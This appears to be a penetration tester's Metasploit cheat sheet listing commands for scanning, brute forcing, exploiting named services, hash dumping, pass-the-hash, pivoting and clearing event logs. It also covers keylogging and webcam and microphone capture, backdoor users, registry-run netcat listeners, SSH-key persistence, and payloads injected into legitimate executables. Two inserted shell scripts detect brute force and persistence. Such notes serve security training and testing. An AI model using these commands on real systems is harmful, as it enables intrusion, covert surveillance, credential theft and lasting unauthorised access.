Metasploit Framework
workspace : list all workspaces
workspace -d abhi : deletes the workspace
workspace abhi : switch workspace
workspace -a abhi : create a new workspace
db: database commands
db_export -f xml -o /path/[Link] : exports all data of a workspace to an XML file
db_import /path/[Link] : import the data from that file
db_nmap -A ip : runs Nmap and imports the scan results into the database
db_status : check the status of the database
db_report -o file : generate a report from the workspace
Normal Commands
services : shows all services scanned
hosts : show all hosts scanned
vulns : display all vulnerabilities
vulns -p 445 : for port 445 only
sessions : to view all sessions
sessions -i sessionid : go to that session
sessions -u id : upgrade the session to meterpreter
sessions -C getuid -i 1 : run a meterpreter command on a meterpreter session without opening it
Use auxiliary modules to re-scan the results you get from Nmap and get more accurate ones. You cannot run Nmap against an internal device that is not reachable from your network, but you can run auxiliary modules against that system through one of the exploited systems on that internal network.
Under a module: use these commands under a module
show options : list all the parameters needed to run the module
show advanced : show advanced parameters
show targets : show all targets that can be exploited
set RHOSTS ip : set your target
setg RPORT port : globally set the target port for all modules
set payload : set a payload to execute
set THREADS n : how many threads are used; fewer threads are less detectable, more threads are more accurate
Meterpreter
help command : help for that specific command
clearev : clears the Application, System and Security event logs on a Windows target
download filepath : downloads a file from the remote machine
upload filename destination_path : uploads a file to the target
edit filepath : opens a file located on the target host, using vim
getuid : shows the user the session is running as
sysinfo : gives basic system info
hashdump or run post/windows/gather/hashdump : dumps the password hashes
idletime : shows how long the remote machine has been running
ipconfig: shows all interfaces and IP
lpwd and lcd : check and change the local working directory
ps : list running processes
ps -s : list system processes
ps -S exe : search processes by name (here every process whose name contains exe)
migrate pid : move the meterpreter into another running process
resource [Link]: execute all commands written in the file at once
search : searches the whole target file system at once; wildcards can be used here
shell : gives a shell of the target
webcam_list : shows all webcams present on the target
webcam_snap : grabs a snapshot from the webcam
webcam_stream : live stream
getsystem : attempts to get SYSTEM privileges
record_mic : record audio from the default microphone
screenshare and screenshot : view or capture the target's desktop
run autoroute -s [Link] : lets us run any module against any device on the internal network of the exploited machine. Enter the internal subnet, or the exploited system's internal IP, here
checksum md5 /bin/bash : get the MD5 hash of /bin/bash
Msfvenom
msfvenom --list payloads : all payloads
msfvenom --list formats : all output formats
-a x64 : architecture
-p windows/meterpreter/reverse_tcp : payload
LHOST, LPORT : listener address and port
-f exe > [Link] : output format (file type)
-f elf : for linux
-e x86/shikata_ga_nai : encoder
-i 10 : number of encoder iterations
-x [Link] : inject the payload in a legitimate executable
-k : placed just after -f and before -x; keeps the original functionality of the executable the payload is injected into
python -m SimpleHTTPServer 80 : starts a simple HTTP server (change to [Link] for python3)
msfconsole -r [Link] : load a resource script (write the commands you would type in msfconsole, in order)
or type resource [Link] in the console
makerc [Link] : make a resource script from the commands you have run in the session
Modules
Auxiliaries
scanner/portscan/tcp or syn : normal port scan
udp_sweep : normal UDP scan
ftp
ftp_login : brute force FTP logins
ftp_version : check the FTP version
ftp/anonymous : check for FTP anonymous login
ftp IP : connect from the terminal; this prompts for username and password
smb
smb_version : normal version check
smb_enumusers : enumerate users on the target system
smb_enumshares : list shares on the target system via the SAM RPC service
smb_login : brute force
smb/psexec : Metasploit's psexec module (see Pass The Hash below)
smbclient -L "\\\\<ip>\\" : check for anonymous login
smbclient -L "\\\\<ip>\\Share" : check for login to a specific share
smbclient -L <IP> -U <username> : connect to the target using SMB
enum4linux -u <username> -p <password> -U <ip_address>
can use [Link] also : [Link] <USER>@<TARGET_IP> [Link]
Web server
http_version
http_header : HTTP header detection (the HTTP method can be specified, e.g. GET)
robots_txt : fetches [Link], a file stored at the root of the web server that prevents search engines from indexing specific web directories
http_options : get the allowed HTTP methods
http_put : checks the directories for ones that allow uploading (putting) a file
dir_scanner : scan web directories
files_dir : searches for interesting files on the HTTP server
if there is an Apache/PHP server always check phpinfo for more information (if the PHP version is lower than 5.3.1 it is vulnerable to a command injection attack; search php cgi)
apache_userdir_enum : enumerate the users on the server
http_login : brute force an authentication form on the site (userfile=[Link] passfile=unix_passwords.txt)
davtest -url [Link] -auth user:password : tells you which file types can be uploaded to the server and which cannot
cadaver [Link] : used to upload a file to a WebDAV directory
Apache Tomcat : tomcat_mgr_login
MySQL
mysql_version : check version
mysql_login : brute force
mysql_enum : requires credentials to run this module
mysql_sql : requires credentials, can execute a SQL query
mysql_schemadump : shows databases and tables
mysql -h <ip_address> -u <username> -p<password> : connect to the MySQL server (no space after -p, otherwise the password is taken as the database name)
ssh
ssh_version
ssh_login
ssh_enumusers
smtp
smtp_version
smtp_enum : user enumeration; attack the service account if one is found
WinRM
winrm_auth_methods : check supported auth methods
winrm_login : brute force
winrm_cmd : run a Windows command with a username and password
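The login brute-force modules above (ssh_login in particular) leave a server-side footprint that is easy to pick up. This is an added example, not part of these notes: POSIX shell helpers that read sshd "Failed password" lines from an auth.log, count failures per source address, and list the usernames tried from one address (the spray pattern of a userfile/passfile run). The log lines and TEST-NET addresses are constructed for the example.

```shell
#!/bin/sh
# Added example (not from these notes): spot password guessing against sshd,
# the server-side footprint of ssh_login, from auth.log lines.

# Print "count ip" for every source address with at least $2 failed logins in $1.
failed_ssh_logins_by_source() {
    grep -E 'sshd\[[0-9]+\]: Failed password' "$1" \
      | sed -E 's/.* from ([0-9.]+) port .*/\1/' \
      | sort | uniq -c \
      | awk -v min="$2" '$1 >= min { print $1, $2 }'
}

# Distinct usernames tried from source $2 in log $1: many names from one
# address is the USERFILE/PASSFILE spray pattern rather than a user typo.
usernames_tried_from() {
    grep -E "sshd\[[0-9]+\]: Failed password .* from $2 port" "$1" \
      | sed -E 's/.*Failed password for (invalid user )?([^ ]+) from .*/\2/' \
      | sort -u | tr '\n' ' ' | sed 's/ $//'
}

# Constructed sample log (TEST-NET addresses, made up for this example).
make_sample_log() {
    f=$(mktemp)
    cat > "$f" <<'EOF'
May 10 10:00:01 web1 sshd[2201]: Failed password for invalid user admin from 198.51.100.7 port 51234 ssh2
May 10 10:00:02 web1 sshd[2203]: Failed password for root from 198.51.100.7 port 51236 ssh2
May 10 10:00:02 web1 sshd[2205]: Failed password for invalid user test from 198.51.100.7 port 51238 ssh2
May 10 10:00:03 web1 sshd[2207]: Failed password for msfadmin from 198.51.100.7 port 51240 ssh2
May 10 10:00:09 web1 sshd[2210]: Failed password for alice from 203.0.113.5 port 40022 ssh2
May 10 10:00:12 web1 sshd[2212]: Accepted publickey for alice from 203.0.113.5 port 40024 ssh2
EOF
    echo "$f"
}

# Stand-alone run: report sources with 3 or more failures and the names they tried.
log=$(make_sample_log)
failed_ssh_logins_by_source "$log" 3 | while read -r count ip; do
    echo "$ip: $count failed logins, users tried: $(usernames_tried_from "$log" "$ip")"
done
rm -f "$log"
```

Point the two functions at a real /var/log/auth.log (or the journal exported to a file) and raise the threshold to match the host's normal failure rate.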
plugins
download the db_autopwn plugin (auto_pwn) from GitHub and move it to /usr/share/metasploit-framework/plugins, then run "load db_autopwn" in the msf console, then db_autopwn -t -p -PI 445 : gives a list of all open ports
or you can use the "analyze" command in msfconsole
wmap_sites -a <IP> : create a site
wmap_targets -t [Link] : set the target
wmap_run -t : show all enabled modules
wmap_run -e : run all the enabled modules
run scraper : save all the info of the current workspace to a location
Exploit
Http
Rejetto HFS v2.3 is vulnerable to remote code execution : rejetto_hfs_exec
Apache Tomcat : tomcat_jsp_upload_bypass_check
set payload java/jsp_shell_bind_tcp
set SHELL cmd ; works on any version below 10
Apache Tomcat JSP Engine 1.1 : get the username and password by brute force, then upload an msfvenom payload built with -f war > [Link], as the Tomcat manager allows us to upload WAR files
certutil -urlcache -f [Link] [Link] : download a file from a Python HTTP server from the Windows cmd
you can use cadaver and davtest for IIS WebDAV
Drupal7: unix/webapp/drupal_drupalgeddon2
unix/webapp/drupal_drupalgeddon
Jenkins v2.441 is also vulnerable : CVE-2024-23897
jenkins_script_console
Xoda 0.4.5 is also vulnerable, with a PHP file upload vuln
badblue and HFS vulns
WinRM
winrm_script_exec : provide username and password
ftp
vsftpd_234_backdoor : vsftpd version 2.3.4 is vulnerable to this backdoor
Samba
Samba v3.5.0 is vulnerable to remote code execution
is_known_pipename : exploit available
use the "check" command in the exploit module to check whether the Samba is vulnerable or not
ssh
libssh is a multiplatform C library implementing SSHv2
libssh v0.6.0-0.8.0 is vulnerable to an authentication bypass vulnerability in the libssh server code
(auxiliary) libssh_auth_bypass : scans whether the service is vulnerable or not ; set SPAWN_PTY true to spawn a shell
smtp
Haraka is an SMTP server developed in [Link]; it comes with a plugin for processing attachments
Haraka below v2.8.9 is vulnerable to command injection
linux/smtp/haraka
set SRVPORT 9898 ; set email_to root@[Link]
set payload linux/x64/meterpreter_reverse_http ; set LPORT and LHOST
post
shell_to_meterpreter : upgrade a shell session to meterpreter
Windows
PostEnum
migrate
win_privs : tells whether the user we are logged in as is admin, a normal user or SYSTEM, and whether it is in the admin group or not
enum_logged_on_users
checkvm: check if the target is a VM or not
enum_applications: get info about installed apps
enum_av_excluded : check for any folders or services excluded from antivirus (Defender) scanning
enum_patches : get info about the installed patches and check whether the system is vulnerable or not
enum_shares
Keylogging / keystrokes
getdesktop : get the different desktops on the system
migrate to [Link] to get the input from the login screen
migrate to a system process that always runs, like explorer
keyscan_start : start capturing everything typed on the keyboard
keyscan_dump : get the captured data
you need to stop and start again to capture the data of another process
once the data is dumped it will not be shown in the next dump
Dump Hash
migrate to the lsass process
load kiwi
lsa_dump
PassTheHash with the psexec module
checkvm : check whether the machine is a virtual machine or not
enum_applications : check the running apps on the system
enum_av_excluded : check the Windows Defender and firewall rules
enum_computers : check for other computers on that domain
enum_patches : patches we can exploit
enum_shares : check the shared drives
enable_rdp : enable RDP on the target if supported
PrivEsc
migrate, priv_migrate
win_privs : show all the privileges and whether the session is user, admin or system
enum_logged_on_users : shows all the logged-in users
enable_rdp : enable the RDP service on the target
net user administrator user12 : create a user from the shell
xfreerdp /u:administrator /p:user12 /v:<IP here>
Pivoting
enum_computers : get the computers on the domain if the target is part of a domain
run autoroute -s <accessed victim IP subnet>
then you can scan the second victim using modules as well
portfwd add -l <LOCAL_PORT> -p <TARGET2_PORT> -r <TARGET2_IP> (in meterpreter)
db_nmap -sS -sV -p <LOCAL_PORT> localhost (in the terminal)
Remember: adding a route to a meterpreter session makes the compromised machine act as a proxy, NOT a router, so use bind shells instead of reverse shells, otherwise the server would not be able to reach you
Persistence
every time you run the handler you will get a new meterpreter session
Clear tracks
clearev
Linux
PostEnum
enum_configs : get the configuration files set up on the system; check them with the loot command in msf
env : gives the OS environment settings
enum_network : get all the network info like firewall, DNS, SSH host key, etc.
enum_protections : whether system security features are present or not (LSM, IDPS, firewall, antivirus); check them with the notes command in msf
enum_system : gives info about the system like users, crons, kernel version, etc.
checkcontainer : check whether the target is a Docker container or not
enum_users_history : get the command history of all the users
chkrootkit : a Linux service used to check for rootkits; versions below 0.5.0 are vulnerable, so see whether any cron job executes this script
linux/gather/hashdump
root can change its own password using: passwd root
Persistence
create a backdoor user to get access to the target again and again after the service is no longer exploitable
usermod -aG root FTP : adds the user FTP to the root group
groups FTP : check the groups of any user
usermod -u 15 FTP : change the user ID of the account so that nobody can tell it is the most recent user
cron_persistence module : quite useful, but an admin can easily spot it
or you can add a manual cronjob as well
service_persistence : similar to Windows; installs a persistent service, and whenever the service is running we can get a meterpreter
The only Linux persistence post module that mostly goes undetected is sshkey_persistence : this adds an SSH key to all users and allows remote login at any time
run loot to see the key, then copy the key
chmod 0400 sshkey_file
ssh -i sshkey_file root@<IP> : you will be logged in without any password
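The Linux persistence tricks above (a backdoor user moved into the root group, its UID lowered into the system range, and a key added to every user's authorized_keys) each leave a footprint an administrator can audit. This is an added example, not part of these notes: POSIX shell checks that take file paths, so they run against the constructed sample root built here or against the live /etc and /home; the account names, UIDs and key lines in the sample are made up.

```shell
#!/bin/sh
# Added example (not from these notes): audit checks for the Linux persistence
# tricks above. Each check takes a path, so it runs against the constructed
# sample below or, with "" as the root, against the live system.

# Login-capable accounts other than root with a system-range UID (< 1000):
# what "usermod -u 15 FTP" leaves behind. Output: name:uid per line.
suspicious_low_uid_accounts() {
    awk -F: '$1 != "root" && $3 < 1000 && $7 !~ /(nologin|false|sync|halt|shutdown)$/ { print $1 ":" $3 }' "$1"
}

# Members of the root group besides root itself ("usermod -aG root FTP").
extra_root_group_members() {
    awk -F: '$1 == "root" { n = split($4, m, ","); for (i = 1; i <= n; i++) if (m[i] != "" && m[i] != "root") print m[i] }' "$1"
}

# authorized_keys files modified in the last $2 days under $1: sshkey_persistence
# touches every user's file at once, so several fresh mtimes together stand out.
recently_changed_authorized_keys() {
    find "$1" -type f -name authorized_keys -mtime "-$2" 2>/dev/null | sort
}

# Constructed sample: a fake /etc and two home directories in a temp dir.
make_sample_root() {
    d=$(mktemp -d)
    mkdir -p "$d/etc" "$d/home/alice/.ssh" "$d/home/ftp/.ssh"
    printf 'root:x:0:0:root:/root:/bin/bash\n' > "$d/etc/passwd"
    printf 'daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n' >> "$d/etc/passwd"
    printf 'alice:x:1000:1000::/home/alice:/bin/bash\n' >> "$d/etc/passwd"
    printf 'FTP:x:15:1001::/home/ftp:/bin/bash\n' >> "$d/etc/passwd"   # backdoor account, system-range UID
    printf 'root:x:0:FTP\nsudo:x:27:alice\n' > "$d/etc/group"         # FTP added to the root group
    printf 'ssh-ed25519 AAAA(constructed) planted@example\n' > "$d/home/alice/.ssh/authorized_keys"
    printf 'ssh-ed25519 AAAA(constructed) planted@example\n' > "$d/home/ftp/.ssh/authorized_keys"
    echo "$d"
}

# Run all three checks under root directory $1 ("" = live system).
audit_persistence() {
    echo "== login accounts with system-range UIDs =="; suspicious_low_uid_accounts "$1/etc/passwd"
    echo "== extra root group members =="; extra_root_group_members "$1/etc/group"
    echo "== authorized_keys changed in the last 7 days =="; recently_changed_authorized_keys "$1/home" 7
}

sample=$(make_sample_root)
audit_persistence "$sample"
rm -rf "$sample"
```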
Armitage
Hosts > add host/host file : to add the target host
right click on the host to get the host info
right click > scan : perform a normal TCP scan
hosts > nmap scan : perform an Nmap scan
Attacks > find attacks : get all the possible exploit vectors
right click > login : after running find attacks, see the potential vectors here
after exploitation, right click > meterpreter to see the various things you can do (helpful if you don't know the commands)
Post: we will use the persistence post-exploitation module to get a persistent connection
search persistence and use manage persistent exe
in a meterpreter session write run persistence -h to see the help
Using Netcat
upload /usr/share/windows-binaries/[Link] . (the dot uploads to the current path)
we can make it run at startup using the reg command, which is used for registry work
reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v netcat -d 'C:\\Path\\to\\[Link] -Ldp 44444 -e C:\\path\\to\\[Link]'
netsh advfirewall firewall add rule name='netcat' dir=in action=allow protocol=Tcp localport=44444 : add a rule to the firewall
netsh firewall show portopening : shows all firewall port rules
run the above in a meterpreter shell
nc -nv targetip 44444 (the port we specified)
Using RDP
it will only work when no other user is logged in
post/windows/manage/enable_rdp : you can use this module to set up a persistent connection
run getgui -e -u test -p test : creates a user test with password test on the target system
you can use the cleanup script to remove this persistent connection
after running this, run rdesktop as the root user to get the GUI when no one is logged into the system; if someone is logged in it will ask that user to log out first
Privilege Escalation
Even if you launch as admin there are chances that your process or app will run without admin access
search for uac modules to escalate your privileges
use exploit/windows/local/ask : this is the most basic one. Run it on the session you want to escalate
we will be the same user with escalated privileges
The same can be done with exploit/local/bypassuac_eventvwr
getsystem : gives you the right to execute processes as an admin if you are an admin
exploit/local/service_permissions : runs your payload with the same permissions as the print spooler process
Pass The Hash
You can run the hashdump post module on a session to gather the hashes and save them in the workspace (use creds to see them)
psexec is a Windows exploit to get a shell via SMB
set SMBUser to the username and SMBPass to the corresponding password (or hash) you got
check whether the hash will work or not using scanner/smb/smb_login
the Windows equivalent of grep for passwords: | findstr /i password
Pivoting
Use post/multi/manage/autoroute : see the other networks the target is connected to and get connected to those networks as well
set SUBNET under this post module to the subnet you want to add
see other interfaces using the ipconfig command in meterpreter
after this, if we set a target in the new IP range, all packets to that network are sent from our network through the open meterpreter session
do a port scan on that network to see if you find any other machine
look for its SMB, SSH or other common ports; if open, run the version scanner
You can pass the hash to the other machine, but the meterpreter will give an error most of the time; you have to use a bind meterpreter so that it works properly
under exploit/windows/smb/psexec, set payload windows/meterpreter/bind_tcp
Other helpful resources
use auxiliary/analyze/crack_ : uses John the Ripper to crack a password
set the [Link] file in /etc: add socks4 [Link] 1080, then use the server/socks4a module
proxychains [Link] ./user:pass@[Link] (first run the module from the previous step, then execute this command)